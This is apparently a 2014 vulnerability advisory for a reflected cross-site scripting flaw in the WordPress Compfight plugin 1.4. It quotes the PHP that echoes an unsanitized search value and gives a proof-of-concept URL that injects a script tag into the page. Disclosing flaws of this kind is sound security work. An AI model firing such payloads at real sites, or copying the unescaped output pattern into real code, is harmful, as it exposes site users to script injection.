WordPress Compfight <= 1.4 Authenticated Reflected XSS Vulnerability

Wordpress Compfight

WordPress Compfight <= 1.4 Authenticated Reflected XSS Vulnerability

 

######################
# Exploit Title : WordPress Compfight 1.4 Authenticated Cross Site Scripting

# Exploit Author : Claudio Viviani - HomeLab IT

# Vendor Homepage : http://wordpress.org/plugins/easy-banners/

# Software Link : http://downloads.wordpress.org/plugin/compfight.1.4.zip

# Date : 2014-07-03

# Tested on : Windows 7 / Mozilla Firefox

######################

# Location :  
http://localhost/wp-content/plugins/compfight/compfight-search.php

######################

# Vulnerable code :

  if (!$search_value) {
      $input_text = 'Enter Keyword(s)';
    } else {
      $input_text = $search_value;
    }

    if ($show_title) {
      $output .= '<h3 class="cf_search_title">Compfight</h3>';
      $output .= '<p class="cf_search_subtitle">Locate the visual inspiration<br/>you need. Super fast!</p>';
    }

    $output .= '<form method="GET" action="" id="cf-form">';
    $output .= '<input type="text" name="search-value" id="search-value" value="' . $input_text . '" onClick="javascript:if(this.value==\'Enter Keyword(s)\') { this.value = \'\'; };" />';
    $output .= '<input type="submit" name="search" id="search" value="Search" class="button" />';
    $output .= '</form>';

$input_text variable not sanitized

######################

Exploit Code:

http://localhost/plugins/compfight/compfight-search.php?search-value='"/><script>alert(1);</script>&search=Search
#####################

Discovered By : Claudio Viviani
        http://www.homelab.it
        info@homelab.it

        https://www.facebook.com/homelabit
        https://twitter.com/homelabit
        https://plus.google.com/+HomelabIt1/
        https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################